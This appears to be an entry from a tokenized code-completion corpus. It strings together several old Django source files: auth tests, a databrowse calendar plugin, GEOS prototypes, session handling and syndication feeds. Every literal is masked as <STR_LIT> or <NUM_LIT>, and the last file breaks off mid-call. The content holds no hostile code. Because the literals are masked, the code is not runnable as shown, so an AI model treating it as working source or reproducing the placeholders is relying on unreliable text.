<s> import os <EOL> from django . conf import global_settings <EOL> from django . contrib . auth import authenticate <EOL> from django . contrib . auth . context_processors import PermWrapper , PermLookupDict <EOL> from django . db . models import Q <EOL> from django . template import context <EOL> from django . test import TestCase <EOL> from django . test . utils import override_settings <EOL> class MockUser ( object ) : <EOL> def has_module_perm ( self , perm ) : <EOL> if perm == '<STR_LIT>' : <EOL> return True <EOL> return False <EOL> def has_perm ( self , perm ) : <EOL> if perm == '<STR_LIT>' : <EOL> return True <EOL> return False <EOL> class PermWrapperTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> class EQLimiterObject ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . eq_calls = <NUM_LIT:0> <EOL> def __eq__ ( self , other ) : <EOL> if self . eq_calls > <NUM_LIT:0> : <EOL> return True <EOL> self . eq_calls += <NUM_LIT:1> <EOL> return False <EOL> def test_permwrapper_in ( self ) : <EOL> """<STR_LIT>""" <EOL> perms = PermWrapper ( MockUser ( ) ) <EOL> def raises ( ) : <EOL> self . EQLimiterObject ( ) in perms <EOL> self . assertRaises ( raises , TypeError ) <EOL> def test_permlookupdict_in ( self ) : <EOL> pldict = PermLookupDict ( MockUser ( ) , '<STR_LIT>' ) <EOL> def raises ( ) : <EOL> self . EQLimiterObject ( ) in pldict <EOL> self . assertRaises ( raises , TypeError ) <EOL> class AuthContextProcessorTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> urls = '<STR_LIT>' <EOL> fixtures = [ '<STR_LIT>' ] <EOL> @ override_settings ( <EOL> MIDDLEWARE_CLASSES = global_settings . MIDDLEWARE_CLASSES , <EOL> TEMPLATE_CONTEXT_PROCESSORS = global_settings . TEMPLATE_CONTEXT_PROCESSORS , <EOL> ) <EOL> def test_session_not_accessed ( self ) : <EOL> """<STR_LIT>""" <EOL> context . _standard_context_processors = None <EOL> response = self . client . get ( '<STR_LIT>' ) <EOL> self . assertContains ( response , "<STR_LIT>" ) <EOL> context . 
_standard_context_processors = None <EOL> @ override_settings ( <EOL> MIDDLEWARE_CLASSES = global_settings . MIDDLEWARE_CLASSES , <EOL> TEMPLATE_CONTEXT_PROCESSORS = global_settings . TEMPLATE_CONTEXT_PROCESSORS , <EOL> ) <EOL> def test_session_is_accessed ( self ) : <EOL> """<STR_LIT>""" <EOL> context . _standard_context_processors = None <EOL> response = self . client . get ( '<STR_LIT>' ) <EOL> self . assertContains ( response , "<STR_LIT>" ) <EOL> context . _standard_context_processors = None <EOL> def test_perms_attrs ( self ) : <EOL> self . client . login ( username = '<STR_LIT>' , password = '<STR_LIT>' ) <EOL> response = self . client . get ( '<STR_LIT>' ) <EOL> self . assertContains ( response , "<STR_LIT>" ) <EOL> def test_message_attrs ( self ) : <EOL> self . client . login ( username = '<STR_LIT>' , password = '<STR_LIT>' ) <EOL> response = self . client . get ( '<STR_LIT>' ) <EOL> self . assertContains ( response , "<STR_LIT>" ) <EOL> def test_user_attrs ( self ) : <EOL> """<STR_LIT>""" <EOL> self . client . login ( username = '<STR_LIT>' , password = '<STR_LIT>' ) <EOL> user = authenticate ( username = '<STR_LIT>' , password = '<STR_LIT>' ) <EOL> response = self . client . get ( '<STR_LIT>' ) <EOL> self . assertContains ( response , "<STR_LIT>" ) <EOL> self . assertContains ( response , "<STR_LIT>" ) <EOL> self . assertContains ( response , "<STR_LIT>" ) <EOL> self . assertContains ( response , "<STR_LIT>" ) <EOL> query = Q ( user = response . context [ '<STR_LIT:user>' ] ) & Q ( someflag = True ) <EOL> self . assertEqual ( response . context [ '<STR_LIT:user>' ] , user ) <EOL> self . assertEqual ( user , response . context [ '<STR_LIT:user>' ] ) <EOL> AuthContextProcessorTests = override_settings ( <EOL> TEMPLATE_DIRS = ( <EOL> os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT>' ) , <EOL> ) , <EOL> USE_TZ = False , <EOL> ) ( AuthContextProcessorTests ) </s>
<s> from django import http <EOL> from django . db import models <EOL> from django . contrib . databrowse . datastructures import EasyModel <EOL> from django . contrib . databrowse . sites import DatabrowsePlugin <EOL> from django . shortcuts import render_to_response <EOL> from django . utils . text import capfirst <EOL> from django . utils . encoding import force_unicode <EOL> from django . utils . safestring import mark_safe <EOL> from django . views . generic import dates <EOL> from django . utils import datetime_safe <EOL> class DateViewMixin ( object ) : <EOL> allow_empty = False <EOL> allow_future = True <EOL> root_url = None <EOL> model = None <EOL> field = None <EOL> def get_context_data ( self , ** kwargs ) : <EOL> context = super ( DateViewMixin , self ) . get_context_data ( ** kwargs ) <EOL> context . update ( { <EOL> '<STR_LIT>' : self . root_url , <EOL> '<STR_LIT>' : self . model , <EOL> '<STR_LIT>' : self . field <EOL> } ) <EOL> return context <EOL> class DayView ( DateViewMixin , dates . DayArchiveView ) : <EOL> template_name = '<STR_LIT>' <EOL> class MonthView ( DateViewMixin , dates . MonthArchiveView ) : <EOL> template_name = '<STR_LIT>' <EOL> class YearView ( DateViewMixin , dates . YearArchiveView ) : <EOL> template_name = '<STR_LIT>' <EOL> class IndexView ( DateViewMixin , dates . ArchiveIndexView ) : <EOL> template_name = '<STR_LIT>' <EOL> class CalendarPlugin ( DatabrowsePlugin ) : <EOL> def __init__ ( self , field_names = None ) : <EOL> self . field_names = field_names <EOL> def field_dict ( self , model ) : <EOL> """<STR_LIT>""" <EOL> if self . field_names is None : <EOL> return dict ( [ ( f . name , f ) for f in model . _meta . fields if isinstance ( f , models . DateField ) ] ) <EOL> else : <EOL> return dict ( [ ( f . name , f ) for f in model . _meta . fields if isinstance ( f , models . DateField ) and f . name in self . field_names ] ) <EOL> def model_index_html ( self , request , model , site ) : <EOL> fields = self . 
field_dict ( model ) <EOL> if not fields : <EOL> return u'<STR_LIT>' <EOL> return mark_safe ( u'<STR_LIT>' % u'<STR_LIT:U+002CU+0020>' . join ( [ '<STR_LIT>' % ( f . name , force_unicode ( capfirst ( f . verbose_name ) ) ) for f in fields . values ( ) ] ) ) <EOL> def urls ( self , plugin_name , easy_instance_field ) : <EOL> if isinstance ( easy_instance_field . field , models . DateField ) : <EOL> d = easy_instance_field . raw_value <EOL> return [ mark_safe ( u'<STR_LIT>' % ( <EOL> easy_instance_field . model . url ( ) , <EOL> plugin_name , easy_instance_field . field . name , <EOL> str ( d . year ) , <EOL> datetime_safe . new_date ( d ) . strftime ( '<STR_LIT>' ) . lower ( ) , <EOL> d . day ) ) ] <EOL> def model_view ( self , request , model_databrowse , url ) : <EOL> self . model , self . site = model_databrowse . model , model_databrowse . site <EOL> self . fields = self . field_dict ( self . model ) <EOL> if not self . fields : <EOL> raise http . Http404 ( '<STR_LIT>' ) <EOL> if url is None : <EOL> return self . homepage_view ( request ) <EOL> url_bits = url . split ( '<STR_LIT:/>' ) <EOL> if url_bits [ <NUM_LIT:0> ] in self . fields : <EOL> return self . calendar_view ( request , self . fields [ url_bits [ <NUM_LIT:0> ] ] , * url_bits [ <NUM_LIT:1> : ] ) <EOL> raise http . Http404 ( '<STR_LIT>' ) <EOL> def homepage_view ( self , request ) : <EOL> easy_model = EasyModel ( self . site , self . model ) <EOL> field_list = self . fields . values ( ) <EOL> field_list . sort ( key = lambda k : k . verbose_name ) <EOL> return render_to_response ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : self . site . root_url , <EOL> '<STR_LIT>' : easy_model , <EOL> '<STR_LIT>' : field_list <EOL> } ) <EOL> def calendar_view ( self , request , field , year = None , month = None , day = None ) : <EOL> easy_model = EasyModel ( self . site , self . model ) <EOL> root_url = self . site . root_url <EOL> if day is not None : <EOL> return DayView . 
as_view ( <EOL> year = year , month = month , day = day , <EOL> date_field = field . name , <EOL> queryset = easy_model . get_query_set ( ) , <EOL> root_url = root_url , <EOL> model = easy_model , <EOL> field = field <EOL> ) ( request ) <EOL> elif month is not None : <EOL> return MonthView . as_view ( <EOL> year = year , month = month , <EOL> date_field = field . name , <EOL> queryset = easy_model . get_query_set ( ) , <EOL> root_url = root_url , <EOL> model = easy_model , <EOL> field = field <EOL> ) ( request ) <EOL> elif year is not None : <EOL> return YearView . as_view ( <EOL> year = year , <EOL> date_field = field . name , <EOL> queryset = easy_model . get_query_set ( ) , <EOL> root_url = root_url , <EOL> model = easy_model , <EOL> field = field <EOL> ) ( request ) <EOL> else : <EOL> return IndexView . as_view ( <EOL> date_field = field . name , <EOL> queryset = easy_model . get_query_set ( ) , <EOL> root_url = root_url , <EOL> model = easy_model , <EOL> field = field <EOL> ) ( request ) <EOL> assert False , ( '<STR_LIT>' % ( field , year , month , day ) ) </s>
<s> try : <EOL> import cPickle as pickle <EOL> except ImportError : <EOL> import pickle <EOL> import hashlib <EOL> from django . conf import settings <EOL> from django . utils . crypto import salted_hmac <EOL> def security_hash ( request , form , * args ) : <EOL> """<STR_LIT>""" <EOL> import warnings <EOL> warnings . warn ( "<STR_LIT>" , <EOL> DeprecationWarning ) <EOL> data = [ ] <EOL> for bf in form : <EOL> if form . empty_permitted and not form . has_changed ( ) : <EOL> value = bf . data or '<STR_LIT>' <EOL> else : <EOL> value = bf . field . clean ( bf . data ) or '<STR_LIT>' <EOL> if isinstance ( value , basestring ) : <EOL> value = value . strip ( ) <EOL> data . append ( ( bf . name , value ) ) <EOL> data . extend ( args ) <EOL> data . append ( settings . SECRET_KEY ) <EOL> pickled = pickle . dumps ( data , pickle . HIGHEST_PROTOCOL ) <EOL> return hashlib . md5 ( pickled ) . hexdigest ( ) <EOL> def form_hmac ( form ) : <EOL> """<STR_LIT>""" <EOL> data = [ ] <EOL> for bf in form : <EOL> if form . empty_permitted and not form . has_changed ( ) : <EOL> value = bf . data or '<STR_LIT>' <EOL> else : <EOL> value = bf . field . clean ( bf . data ) or '<STR_LIT>' <EOL> if isinstance ( value , basestring ) : <EOL> value = value . strip ( ) <EOL> data . append ( ( bf . name , value ) ) <EOL> pickled = pickle . dumps ( data , pickle . HIGHEST_PROTOCOL ) <EOL> key_salt = '<STR_LIT>' <EOL> return salted_hmac ( key_salt , pickled ) . hexdigest ( ) </s>
<s> from django . db . models . sql . aggregates import * <EOL> from django . contrib . gis . db . models . fields import GeometryField <EOL> class GeoAggregate ( Aggregate ) : <EOL> sql_template = '<STR_LIT>' <EOL> conversion_class = None <EOL> is_extent = False <EOL> def __init__ ( self , col , source = None , is_summary = False , tolerance = <NUM_LIT> , ** extra ) : <EOL> super ( GeoAggregate , self ) . __init__ ( col , source , is_summary , ** extra ) <EOL> self . tolerance = tolerance <EOL> if not isinstance ( self . source , GeometryField ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> def as_sql ( self , qn , connection ) : <EOL> "<STR_LIT>" <EOL> if connection . ops . oracle : <EOL> self . extra [ '<STR_LIT>' ] = self . tolerance <EOL> if hasattr ( self . col , '<STR_LIT>' ) : <EOL> field_name = self . col . as_sql ( qn , connection ) <EOL> elif isinstance ( self . col , ( list , tuple ) ) : <EOL> field_name = '<STR_LIT:.>' . join ( [ qn ( c ) for c in self . col ] ) <EOL> else : <EOL> field_name = self . col <EOL> sql_template , sql_function = connection . ops . spatial_aggregate_sql ( self ) <EOL> params = { <EOL> '<STR_LIT>' : sql_function , <EOL> '<STR_LIT>' : field_name <EOL> } <EOL> params . update ( self . extra ) <EOL> return sql_template % params <EOL> class Collect ( GeoAggregate ) : <EOL> pass <EOL> class Extent ( GeoAggregate ) : <EOL> is_extent = '<STR_LIT>' <EOL> class Extent3D ( GeoAggregate ) : <EOL> is_extent = '<STR_LIT>' <EOL> class MakeLine ( GeoAggregate ) : <EOL> pass <EOL> class Union ( GeoAggregate ) : <EOL> pass </s>
<s> from ctypes import c_char_p , c_int , c_size_t , c_ubyte , POINTER <EOL> from django . contrib . gis . geos . libgeos import CS_PTR , GEOM_PTR <EOL> from django . contrib . gis . geos . prototypes . errcheck import ( <EOL> check_geom , check_minus_one , check_sized_string , check_string , check_zero ) <EOL> from django . contrib . gis . geos . prototypes . threadsafe import GEOSFunc <EOL> c_uchar_p = POINTER ( c_ubyte ) <EOL> class geos_char_p ( c_char_p ) : <EOL> pass <EOL> def bin_constructor ( func ) : <EOL> "<STR_LIT>" <EOL> func . argtypes = [ c_char_p , c_size_t ] <EOL> func . restype = GEOM_PTR <EOL> func . errcheck = check_geom <EOL> return func <EOL> def bin_output ( func ) : <EOL> "<STR_LIT>" <EOL> func . argtypes = [ GEOM_PTR , POINTER ( c_size_t ) ] <EOL> func . errcheck = check_sized_string <EOL> func . restype = c_uchar_p <EOL> return func <EOL> def geom_output ( func , argtypes ) : <EOL> "<STR_LIT>" <EOL> if argtypes : func . argtypes = argtypes <EOL> func . restype = GEOM_PTR <EOL> func . errcheck = check_geom <EOL> return func <EOL> def geom_index ( func ) : <EOL> "<STR_LIT>" <EOL> return geom_output ( func , [ GEOM_PTR , c_int ] ) <EOL> def int_from_geom ( func , zero = False ) : <EOL> "<STR_LIT>" <EOL> func . argtypes = [ GEOM_PTR ] <EOL> func . restype = c_int <EOL> if zero : <EOL> func . errcheck = check_zero <EOL> else : <EOL> func . errcheck = check_minus_one <EOL> return func <EOL> def string_from_geom ( func ) : <EOL> "<STR_LIT>" <EOL> func . argtypes = [ GEOM_PTR ] <EOL> func . restype = geos_char_p <EOL> func . 
errcheck = check_string <EOL> return func <EOL> from_hex = bin_constructor ( GEOSFunc ( '<STR_LIT>' ) ) <EOL> from_wkb = bin_constructor ( GEOSFunc ( '<STR_LIT>' ) ) <EOL> from_wkt = geom_output ( GEOSFunc ( '<STR_LIT>' ) , [ c_char_p ] ) <EOL> to_hex = bin_output ( GEOSFunc ( '<STR_LIT>' ) ) <EOL> to_wkb = bin_output ( GEOSFunc ( '<STR_LIT>' ) ) <EOL> to_wkt = string_from_geom ( GEOSFunc ( '<STR_LIT>' ) ) <EOL> geos_normalize = int_from_geom ( GEOSFunc ( '<STR_LIT>' ) ) <EOL> geos_type = string_from_geom ( GEOSFunc ( '<STR_LIT>' ) ) <EOL> geos_typeid = int_from_geom ( GEOSFunc ( '<STR_LIT>' ) ) <EOL> get_dims = int_from_geom ( GEOSFunc ( '<STR_LIT>' ) , zero = True ) <EOL> get_num_coords = int_from_geom ( GEOSFunc ( '<STR_LIT>' ) ) <EOL> get_num_geoms = int_from_geom ( GEOSFunc ( '<STR_LIT>' ) ) <EOL> create_point = geom_output ( GEOSFunc ( '<STR_LIT>' ) , [ CS_PTR ] ) <EOL> create_linestring = geom_output ( GEOSFunc ( '<STR_LIT>' ) , [ CS_PTR ] ) <EOL> create_linearring = geom_output ( GEOSFunc ( '<STR_LIT>' ) , [ CS_PTR ] ) <EOL> create_polygon = geom_output ( GEOSFunc ( '<STR_LIT>' ) , None ) <EOL> create_collection = geom_output ( GEOSFunc ( '<STR_LIT>' ) , None ) <EOL> get_extring = geom_output ( GEOSFunc ( '<STR_LIT>' ) , [ GEOM_PTR ] ) <EOL> get_intring = geom_index ( GEOSFunc ( '<STR_LIT>' ) ) <EOL> get_nrings = int_from_geom ( GEOSFunc ( '<STR_LIT>' ) ) <EOL> get_geomn = geom_index ( GEOSFunc ( '<STR_LIT>' ) ) <EOL> geom_clone = GEOSFunc ( '<STR_LIT>' ) <EOL> geom_clone . argtypes = [ GEOM_PTR ] <EOL> geom_clone . restype = GEOM_PTR <EOL> destroy_geom = GEOSFunc ( '<STR_LIT>' ) <EOL> destroy_geom . argtypes = [ GEOM_PTR ] <EOL> destroy_geom . restype = None <EOL> geos_get_srid = GEOSFunc ( '<STR_LIT>' ) <EOL> geos_get_srid . argtypes = [ GEOM_PTR ] <EOL> geos_get_srid . restype = c_int <EOL> geos_set_srid = GEOSFunc ( '<STR_LIT>' ) <EOL> geos_set_srid . argtypes = [ GEOM_PTR , c_int ] <EOL> geos_set_srid . restype = None </s>
<s> from __future__ import absolute_import <EOL> import os <EOL> from django . db import connections <EOL> from django . test import TestCase <EOL> from django . contrib . gis . gdal import Driver <EOL> from django . contrib . gis . geometry . test_data import TEST_DATA <EOL> from django . contrib . gis . utils . ogrinspect import ogrinspect <EOL> from . models import AllOGRFields <EOL> class OGRInspectTest ( TestCase ) : <EOL> def test_poly ( self ) : <EOL> shp_file = os . path . join ( TEST_DATA , '<STR_LIT>' , '<STR_LIT>' ) <EOL> model_def = ogrinspect ( shp_file , '<STR_LIT>' ) <EOL> expected = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> self . assertEqual ( model_def , '<STR_LIT:\n>' . join ( expected ) ) <EOL> def test_date_field ( self ) : <EOL> shp_file = os . path . join ( TEST_DATA , '<STR_LIT>' , '<STR_LIT>' ) <EOL> model_def = ogrinspect ( shp_file , '<STR_LIT>' ) <EOL> expected = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> self . assertEqual ( model_def , '<STR_LIT:\n>' . join ( expected ) ) <EOL> def test_time_field ( self ) : <EOL> if not connections [ '<STR_LIT:default>' ] . ops . postgis : <EOL> return <EOL> ogr_db = get_ogr_db_string ( ) <EOL> if not ogr_db : <EOL> return <EOL> model_def = ogrinspect ( ogr_db , '<STR_LIT>' , <EOL> layer_key = AllOGRFields . _meta . db_table , <EOL> decimal = [ '<STR_LIT>' ] ) <EOL> expected = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> self . 
assertEqual ( model_def , '<STR_LIT:\n>' . join ( expected ) ) <EOL> def get_ogr_db_string ( ) : <EOL> db = connections . databases [ '<STR_LIT:default>' ] <EOL> drivers = { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> } <EOL> drv_name , db_str = drivers [ db [ '<STR_LIT>' ] ] <EOL> try : <EOL> Driver ( drv_name ) <EOL> except : <EOL> return None <EOL> params = [ "<STR_LIT>" % db [ '<STR_LIT>' ] ] <EOL> def add ( key , template ) : <EOL> value = db . get ( key , None ) <EOL> if value : <EOL> params . append ( template % value ) <EOL> add ( '<STR_LIT>' , "<STR_LIT>" ) <EOL> add ( '<STR_LIT>' , "<STR_LIT>" ) <EOL> add ( '<STR_LIT>' , "<STR_LIT>" ) <EOL> add ( '<STR_LIT>' , "<STR_LIT>" ) <EOL> return '<STR_LIT>' % ( db_str , '<STR_LIT:U+0020>' . join ( params ) ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> from django . contrib . localflavor . py . py_department import DEPARTMENT_CHOICES , DEPARTMENT_ROMAN_CHOICES <EOL> from django . forms . fields import Select <EOL> class PyDepartmentSelect ( Select ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , attrs = None ) : <EOL> super ( PyDepartmentSelect , self ) . __init__ ( attrs , choices = DEPARTMENT_CHOICES ) <EOL> class PyNumberedDepartmentSelect ( Select ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , attrs = None ) : <EOL> super ( PyNumberedDepartmentSelect , self ) . __init__ ( attrs , choices = DEPARTMENT_ROMAN_CHOICES ) </s>
<s> import base64 <EOL> import time <EOL> from datetime import datetime , timedelta <EOL> try : <EOL> import cPickle as pickle <EOL> except ImportError : <EOL> import pickle <EOL> from django . conf import settings <EOL> from django . core . exceptions import SuspiciousOperation <EOL> from django . utils . crypto import constant_time_compare <EOL> from django . utils . crypto import get_random_string <EOL> from django . utils . crypto import salted_hmac <EOL> from django . utils import timezone <EOL> class CreateError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class SessionBase ( object ) : <EOL> """<STR_LIT>""" <EOL> TEST_COOKIE_NAME = '<STR_LIT>' <EOL> TEST_COOKIE_VALUE = '<STR_LIT>' <EOL> def __init__ ( self , session_key = None ) : <EOL> self . _session_key = session_key <EOL> self . accessed = False <EOL> self . modified = False <EOL> def __contains__ ( self , key ) : <EOL> return key in self . _session <EOL> def __getitem__ ( self , key ) : <EOL> return self . _session [ key ] <EOL> def __setitem__ ( self , key , value ) : <EOL> self . _session [ key ] = value <EOL> self . modified = True <EOL> def __delitem__ ( self , key ) : <EOL> del self . _session [ key ] <EOL> self . modified = True <EOL> def get ( self , key , default = None ) : <EOL> return self . _session . get ( key , default ) <EOL> def pop ( self , key , * args ) : <EOL> self . modified = self . modified or key in self . _session <EOL> return self . _session . pop ( key , * args ) <EOL> def setdefault ( self , key , value ) : <EOL> if key in self . _session : <EOL> return self . _session [ key ] <EOL> else : <EOL> self . modified = True <EOL> self . _session [ key ] = value <EOL> return value <EOL> def set_test_cookie ( self ) : <EOL> self [ self . TEST_COOKIE_NAME ] = self . TEST_COOKIE_VALUE <EOL> def test_cookie_worked ( self ) : <EOL> return self . get ( self . TEST_COOKIE_NAME ) == self . TEST_COOKIE_VALUE <EOL> def delete_test_cookie ( self ) : <EOL> del self [ self . 
TEST_COOKIE_NAME ] <EOL> def _hash ( self , value ) : <EOL> key_salt = "<STR_LIT>" + self . __class__ . __name__ <EOL> return salted_hmac ( key_salt , value ) . hexdigest ( ) <EOL> def encode ( self , session_dict ) : <EOL> "<STR_LIT>" <EOL> pickled = pickle . dumps ( session_dict , pickle . HIGHEST_PROTOCOL ) <EOL> hash = self . _hash ( pickled ) <EOL> return base64 . encodestring ( hash + "<STR_LIT::>" + pickled ) <EOL> def decode ( self , session_data ) : <EOL> encoded_data = base64 . decodestring ( session_data ) <EOL> try : <EOL> hash , pickled = encoded_data . split ( '<STR_LIT::>' , <NUM_LIT:1> ) <EOL> expected_hash = self . _hash ( pickled ) <EOL> if not constant_time_compare ( hash , expected_hash ) : <EOL> raise SuspiciousOperation ( "<STR_LIT>" ) <EOL> else : <EOL> return pickle . loads ( pickled ) <EOL> except Exception : <EOL> return { } <EOL> def update ( self , dict_ ) : <EOL> self . _session . update ( dict_ ) <EOL> self . modified = True <EOL> def has_key ( self , key ) : <EOL> return key in self . _session <EOL> def keys ( self ) : <EOL> return self . _session . keys ( ) <EOL> def values ( self ) : <EOL> return self . _session . values ( ) <EOL> def items ( self ) : <EOL> return self . _session . items ( ) <EOL> def iterkeys ( self ) : <EOL> return self . _session . iterkeys ( ) <EOL> def itervalues ( self ) : <EOL> return self . _session . itervalues ( ) <EOL> def iteritems ( self ) : <EOL> return self . _session . iteritems ( ) <EOL> def clear ( self ) : <EOL> self . _session_cache = { } <EOL> self . accessed = True <EOL> self . modified = True <EOL> def _get_new_session_key ( self ) : <EOL> "<STR_LIT>" <EOL> hex_chars = '<STR_LIT>' <EOL> while True : <EOL> session_key = get_random_string ( <NUM_LIT:32> , hex_chars ) <EOL> if not self . exists ( session_key ) : <EOL> break <EOL> return session_key <EOL> def _get_or_create_session_key ( self ) : <EOL> if self . _session_key is None : <EOL> self . _session_key = self . 
_get_new_session_key ( ) <EOL> return self . _session_key <EOL> def _get_session_key ( self ) : <EOL> return self . _session_key <EOL> session_key = property ( _get_session_key ) <EOL> def _get_session ( self , no_load = False ) : <EOL> """<STR_LIT>""" <EOL> self . accessed = True <EOL> try : <EOL> return self . _session_cache <EOL> except AttributeError : <EOL> if self . session_key is None or no_load : <EOL> self . _session_cache = { } <EOL> else : <EOL> self . _session_cache = self . load ( ) <EOL> return self . _session_cache <EOL> _session = property ( _get_session ) <EOL> def get_expiry_age ( self ) : <EOL> """<STR_LIT>""" <EOL> expiry = self . get ( '<STR_LIT>' ) <EOL> if not expiry : <EOL> return settings . SESSION_COOKIE_AGE <EOL> if not isinstance ( expiry , datetime ) : <EOL> return expiry <EOL> delta = expiry - timezone . now ( ) <EOL> return delta . days * <NUM_LIT> + delta . seconds <EOL> def get_expiry_date ( self ) : <EOL> """<STR_LIT>""" <EOL> expiry = self . get ( '<STR_LIT>' ) <EOL> if isinstance ( expiry , datetime ) : <EOL> return expiry <EOL> if not expiry : <EOL> expiry = settings . SESSION_COOKIE_AGE <EOL> return timezone . now ( ) + timedelta ( seconds = expiry ) <EOL> def set_expiry ( self , value ) : <EOL> """<STR_LIT>""" <EOL> if value is None : <EOL> try : <EOL> del self [ '<STR_LIT>' ] <EOL> except KeyError : <EOL> pass <EOL> return <EOL> if isinstance ( value , timedelta ) : <EOL> value = timezone . now ( ) + value <EOL> self [ '<STR_LIT>' ] = value <EOL> def get_expire_at_browser_close ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . get ( '<STR_LIT>' ) is None : <EOL> return settings . SESSION_EXPIRE_AT_BROWSER_CLOSE <EOL> return self . get ( '<STR_LIT>' ) == <NUM_LIT:0> <EOL> def flush ( self ) : <EOL> """<STR_LIT>""" <EOL> self . clear ( ) <EOL> self . delete ( ) <EOL> self . create ( ) <EOL> def cycle_key ( self ) : <EOL> """<STR_LIT>""" <EOL> data = self . _session_cache <EOL> key = self . session_key <EOL> self . 
create ( ) <EOL> self . _session_cache = data <EOL> self . delete ( key ) <EOL> def exists ( self , session_key ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def create ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def save ( self , must_create = False ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def delete ( self , session_key = None ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def load ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError </s>
<s> from django . conf import settings <EOL> from django . contrib . sites . models import get_current_site <EOL> from django . core . exceptions import ImproperlyConfigured , ObjectDoesNotExist <EOL> from django . http import HttpResponse , Http404 <EOL> from django . template import loader , TemplateDoesNotExist , RequestContext <EOL> from django . utils import feedgenerator , tzinfo <EOL> from django . utils . encoding import force_unicode , iri_to_uri , smart_unicode <EOL> from django . utils . html import escape <EOL> from django . utils . timezone import is_naive <EOL> def add_domain ( domain , url , secure = False ) : <EOL> protocol = '<STR_LIT>' if secure else '<STR_LIT:http>' <EOL> if url . startswith ( '<STR_LIT>' ) : <EOL> url = '<STR_LIT>' % ( protocol , url ) <EOL> elif not ( url . startswith ( '<STR_LIT>' ) <EOL> or url . startswith ( '<STR_LIT>' ) <EOL> or url . startswith ( '<STR_LIT>' ) ) : <EOL> url = iri_to_uri ( u'<STR_LIT>' % ( protocol , domain , url ) ) <EOL> return url <EOL> class FeedDoesNotExist ( ObjectDoesNotExist ) : <EOL> pass <EOL> class Feed ( object ) : <EOL> feed_type = feedgenerator . DefaultFeed <EOL> title_template = None <EOL> description_template = None <EOL> def __call__ ( self , request , * args , ** kwargs ) : <EOL> try : <EOL> obj = self . get_object ( request , * args , ** kwargs ) <EOL> except ObjectDoesNotExist : <EOL> raise Http404 ( '<STR_LIT>' ) <EOL> feedgen = self . get_feed ( obj , request ) <EOL> response = HttpResponse ( content_type = feedgen . mime_type ) <EOL> feedgen . write ( response , '<STR_LIT:utf-8>' ) <EOL> return response <EOL> def item_title ( self , item ) : <EOL> return escape ( force_unicode ( item ) ) <EOL> def item_description ( self , item ) : <EOL> return force_unicode ( item ) <EOL> def item_link ( self , item ) : <EOL> try : <EOL> return item . get_absolute_url ( ) <EOL> except AttributeError : <EOL> raise ImproperlyConfigured ( '<STR_LIT>' % item . __class__ . 
__name__ ) <EOL> def __get_dynamic_attr ( self , attname , obj , default = None ) : <EOL> try : <EOL> attr = getattr ( self , attname ) <EOL> except AttributeError : <EOL> return default <EOL> if callable ( attr ) : <EOL> if hasattr ( attr , '<STR_LIT>' ) : <EOL> argcount = attr . func_code . co_argcount <EOL> else : <EOL> argcount = attr . __call__ . func_code . co_argcount <EOL> if argcount == <NUM_LIT:2> : <EOL> return attr ( obj ) <EOL> else : <EOL> return attr ( ) <EOL> return attr <EOL> def feed_extra_kwargs ( self , obj ) : <EOL> """<STR_LIT>""" <EOL> return { } <EOL> def item_extra_kwargs ( self , item ) : <EOL> """<STR_LIT>""" <EOL> return { } <EOL> def get_object ( self , request , * args , ** kwargs ) : <EOL> return None <EOL> def get_feed ( self , obj , request ) : <EOL> """<STR_LIT>""" <EOL> current_site = get_current_site ( request ) <EOL> link = self . __get_dynamic_attr ( '<STR_LIT>' , obj ) <EOL> link = add_domain ( current_site . domain , link , request . is_secure ( ) ) <EOL> feed = self . feed_type ( <EOL> title = self . __get_dynamic_attr ( '<STR_LIT:title>' , obj ) , <EOL> subtitle = self . __get_dynamic_attr ( '<STR_LIT>' , obj ) , <EOL> link = link , <EOL> description = self . __get_dynamic_attr ( '<STR_LIT:description>' , obj ) , <EOL> language = settings . LANGUAGE_CODE . decode ( ) , <EOL> feed_url = add_domain ( <EOL> current_site . domain , <EOL> self . __get_dynamic_attr ( '<STR_LIT>' , obj ) or request . path , <EOL> request . is_secure ( ) , <EOL> ) , <EOL> author_name = self . __get_dynamic_attr ( '<STR_LIT>' , obj ) , <EOL> author_link = self . __get_dynamic_attr ( '<STR_LIT>' , obj ) , <EOL> author_email = self . __get_dynamic_attr ( '<STR_LIT>' , obj ) , <EOL> categories = self . __get_dynamic_attr ( '<STR_LIT>' , obj ) , <EOL> feed_copyright = self . __get_dynamic_attr ( '<STR_LIT>' , obj ) , <EOL> feed_guid = self . __get_dynamic_attr ( 